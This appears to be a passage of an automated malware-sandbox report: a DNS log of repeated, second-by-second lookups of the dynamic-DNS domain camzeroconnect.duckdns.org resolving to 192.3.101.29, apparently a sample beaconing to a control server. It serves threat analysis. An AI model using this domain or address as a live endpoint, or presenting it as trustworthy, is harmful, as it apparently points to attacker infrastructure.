                                                                                            Sep 27, 2024 14:02:39.101744890 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.108789921 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.131923914 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.139178038 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.243313074 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.256032944 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.263977051 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.288079977 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.295272112 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.301724911 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.309058905 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.316507101 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.368000031 CEST8.8.8.8192.168.2.220x4d47No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.474973917 CEST8.8.8.8192.168.2.220x4d47No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.482492924 CEST8.8.8.8192.168.2.220x4d47No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.489629030 CEST8.8.8.8192.168.2.220x4d47No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.496916056 CEST8.8.8.8192.168.2.220x4d47No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.518887997 CEST8.8.8.8192.168.2.220x3f03No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.525933027 CEST8.8.8.8192.168.2.220x3f03No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.534140110 CEST8.8.8.8192.168.2.220x3f03No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.541544914 CEST8.8.8.8192.168.2.220x3f03No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.550646067 CEST8.8.8.8192.168.2.220x3f03No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.571538925 CEST8.8.8.8192.168.2.220xc50fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.579875946 CEST8.8.8.8192.168.2.220xc50fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.592400074 CEST8.8.8.8192.168.2.220xc50fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.604234934 CEST8.8.8.8192.168.2.220xc50fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.616240978 CEST8.8.8.8192.168.2.220xc50fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.650427103 CEST8.8.8.8192.168.2.220x8b3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.658082962 CEST8.8.8.8192.168.2.220x8b3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.665216923 CEST8.8.8.8192.168.2.220x8b3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.672744989 CEST8.8.8.8192.168.2.220x8b3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.679428101 CEST8.8.8.8192.168.2.220x8b3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.697150946 CEST8.8.8.8192.168.2.220xfc62No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.705549955 CEST8.8.8.8192.168.2.220xfc62No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.713053942 CEST8.8.8.8192.168.2.220xfc62No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.722497940 CEST8.8.8.8192.168.2.220xfc62No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.730133057 CEST8.8.8.8192.168.2.220xfc62No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.861085892 CEST8.8.8.8192.168.2.220x3016No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.873302937 CEST8.8.8.8192.168.2.220x3016No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.884577036 CEST8.8.8.8192.168.2.220x3016No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.893030882 CEST8.8.8.8192.168.2.220x3016No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.904799938 CEST8.8.8.8192.168.2.220x3016No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.923938036 CEST8.8.8.8192.168.2.220x5fbdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.933187008 CEST8.8.8.8192.168.2.220x5fbdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.943989992 CEST8.8.8.8192.168.2.220x5fbdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.956891060 CEST8.8.8.8192.168.2.220x5fbdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.968827963 CEST8.8.8.8192.168.2.220x5fbdNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:50.986630917 CEST8.8.8.8192.168.2.220x51b4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:50.993877888 CEST8.8.8.8192.168.2.220x51b4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:51.002264977 CEST8.8.8.8192.168.2.220x51b4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:51.010273933 CEST8.8.8.8192.168.2.220x51b4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:51.018040895 CEST8.8.8.8192.168.2.220x51b4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.403841019 CEST8.8.8.8192.168.2.220x3777No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.411003113 CEST8.8.8.8192.168.2.220x3777No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.417543888 CEST8.8.8.8192.168.2.220x3777No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.424103975 CEST8.8.8.8192.168.2.220x3777No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.430675983 CEST8.8.8.8192.168.2.220x3777No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.448434114 CEST8.8.8.8192.168.2.220x848eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.456218004 CEST8.8.8.8192.168.2.220x848eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.467708111 CEST8.8.8.8192.168.2.220x848eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.475656986 CEST8.8.8.8192.168.2.220x848eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.484428883 CEST8.8.8.8192.168.2.220x848eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.531869888 CEST8.8.8.8192.168.2.220xc0e3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.539583921 CEST8.8.8.8192.168.2.220xc0e3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.546789885 CEST8.8.8.8192.168.2.220xc0e3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.553998947 CEST8.8.8.8192.168.2.220xc0e3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.561537027 CEST8.8.8.8192.168.2.220xc0e3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.702800035 CEST8.8.8.8192.168.2.220xca88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.709841967 CEST8.8.8.8192.168.2.220xca88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.725799084 CEST8.8.8.8192.168.2.220xca88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.736851931 CEST8.8.8.8192.168.2.220xca88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.743971109 CEST8.8.8.8192.168.2.220xca88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:56.765150070 CEST8.8.8.8192.168.2.220x732bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:59.793366909 CEST8.8.8.8192.168.2.220x732bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:59.800708055 CEST8.8.8.8192.168.2.220x732bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.816037893 CEST8.8.8.8192.168.2.220x73b7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.832328081 CEST8.8.8.8192.168.2.220x73b7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.844110966 CEST8.8.8.8192.168.2.220x73b7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.853913069 CEST8.8.8.8192.168.2.220x73b7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.868678093 CEST8.8.8.8192.168.2.220x73b7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.780327082 CEST8.8.8.8192.168.2.220x732bServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.910651922 CEST8.8.8.8192.168.2.220xbc93No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.917521954 CEST8.8.8.8192.168.2.220xbc93No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.924494028 CEST8.8.8.8192.168.2.220xbc93No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.931413889 CEST8.8.8.8192.168.2.220xbc93No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.938533068 CEST8.8.8.8192.168.2.220xbc93No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:02.780363083 CEST8.8.8.8192.168.2.220x732bServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.091680050 CEST8.8.8.8192.168.2.220x2de3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.098715067 CEST8.8.8.8192.168.2.220x2de3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.109014988 CEST8.8.8.8192.168.2.220x2de3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.123436928 CEST8.8.8.8192.168.2.220x2de3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.135947943 CEST8.8.8.8192.168.2.220x2de3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.165560961 CEST8.8.8.8192.168.2.220x1a88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.173029900 CEST8.8.8.8192.168.2.220x1a88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.180380106 CEST8.8.8.8192.168.2.220x1a88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.187701941 CEST8.8.8.8192.168.2.220x1a88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.194317102 CEST8.8.8.8192.168.2.220x1a88No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.220433950 CEST8.8.8.8192.168.2.220x4b51No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.227550983 CEST8.8.8.8192.168.2.220x4b51No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:10.215622902 CEST8.8.8.8192.168.2.220x4b51Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:10.223351955 CEST8.8.8.8192.168.2.220x4b51No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.234126091 CEST8.8.8.8192.168.2.220x4b51Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.258416891 CEST8.8.8.8192.168.2.220xc973No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.268800974 CEST8.8.8.8192.168.2.220xc973No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:13.287338972 CEST8.8.8.8192.168.2.220xc973No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:13.300694942 CEST8.8.8.8192.168.2.220xc973No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.354059935 CEST8.8.8.8192.168.2.220x2a54No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.362004042 CEST8.8.8.8192.168.2.220x2a54No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:15.463165045 CEST8.8.8.8192.168.2.220x2a54No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:15.476583004 CEST8.8.8.8192.168.2.220x2a54No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:16.276185036 CEST8.8.8.8192.168.2.220xc973Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:20.487415075 CEST8.8.8.8192.168.2.220x2a54Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:20.724675894 CEST8.8.8.8192.168.2.220x5bfbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.743968964 CEST8.8.8.8192.168.2.220x5bfbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.750809908 CEST8.8.8.8192.168.2.220x5bfbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.758341074 CEST8.8.8.8192.168.2.220x5bfbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.787866116 CEST8.8.8.8192.168.2.220x134eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.802057981 CEST8.8.8.8192.168.2.220x134eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.810877085 CEST8.8.8.8192.168.2.220x134eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:23.839494944 CEST8.8.8.8192.168.2.220x5bfbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:26.839483023 CEST8.8.8.8192.168.2.220x134eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.817451000 CEST8.8.8.8192.168.2.220x134eServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.866089106 CEST8.8.8.8192.168.2.220xd342No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.875403881 CEST8.8.8.8192.168.2.220xd342No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:29.885620117 CEST8.8.8.8192.168.2.220xd342No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:29.893071890 CEST8.8.8.8192.168.2.220xd342No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.908344030 CEST8.8.8.8192.168.2.220x5a59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.915632963 CEST8.8.8.8192.168.2.220x5a59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.922255039 CEST8.8.8.8192.168.2.220x5a59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.929333925 CEST8.8.8.8192.168.2.220x5a59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.936537981 CEST8.8.8.8192.168.2.220x5a59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.950285912 CEST8.8.8.8192.168.2.220xb830No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.957325935 CEST8.8.8.8192.168.2.220xb830No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.964711905 CEST8.8.8.8192.168.2.220xb830No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.971112013 CEST8.8.8.8192.168.2.220xb830No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.978169918 CEST8.8.8.8192.168.2.220xb830No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:32.884155035 CEST8.8.8.8192.168.2.220xd342Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:32.996156931 CEST8.8.8.8192.168.2.220x5aafNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.007205963 CEST8.8.8.8192.168.2.220x5aafNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.027122974 CEST8.8.8.8192.168.2.220x5aafNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.060317039 CEST8.8.8.8192.168.2.220x5aafNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.082410097 CEST8.8.8.8192.168.2.220x5aafNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.105576992 CEST8.8.8.8192.168.2.220xf944No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.112112045 CEST8.8.8.8192.168.2.220xf944No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:36.134543896 CEST8.8.8.8192.168.2.220xf944No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:36.146959066 CEST8.8.8.8192.168.2.220xf944No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.171109915 CEST8.8.8.8192.168.2.220x9ecfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.179757118 CEST8.8.8.8192.168.2.220x9ecfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.201328039 CEST8.8.8.8192.168.2.220x9ecfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.212629080 CEST8.8.8.8192.168.2.220x9ecfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:39.127368927 CEST8.8.8.8192.168.2.220xf944Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:39.353874922 CEST8.8.8.8192.168.2.220x9ecfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:40.483434916 CEST8.8.8.8192.168.2.220xf2ffNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.592226028 CEST8.8.8.8192.168.2.220xf2ffNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.615974903 CEST8.8.8.8192.168.2.220xf2ffNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.644957066 CEST8.8.8.8192.168.2.220xf2ffNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.671911001 CEST8.8.8.8192.168.2.220x5f1dNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.679816961 CEST8.8.8.8192.168.2.220x5f1dNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.688930988 CEST8.8.8.8192.168.2.220x5f1dNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.697402000 CEST8.8.8.8192.168.2.220x5f1dNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.707848072 CEST8.8.8.8192.168.2.220x5f1dNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.730081081 CEST8.8.8.8192.168.2.220x5399No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.737183094 CEST8.8.8.8192.168.2.220x5399No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.744046926 CEST8.8.8.8192.168.2.220x5399No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.752101898 CEST8.8.8.8192.168.2.220x5399No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.759710073 CEST8.8.8.8192.168.2.220x5399No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.772829056 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.780010939 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
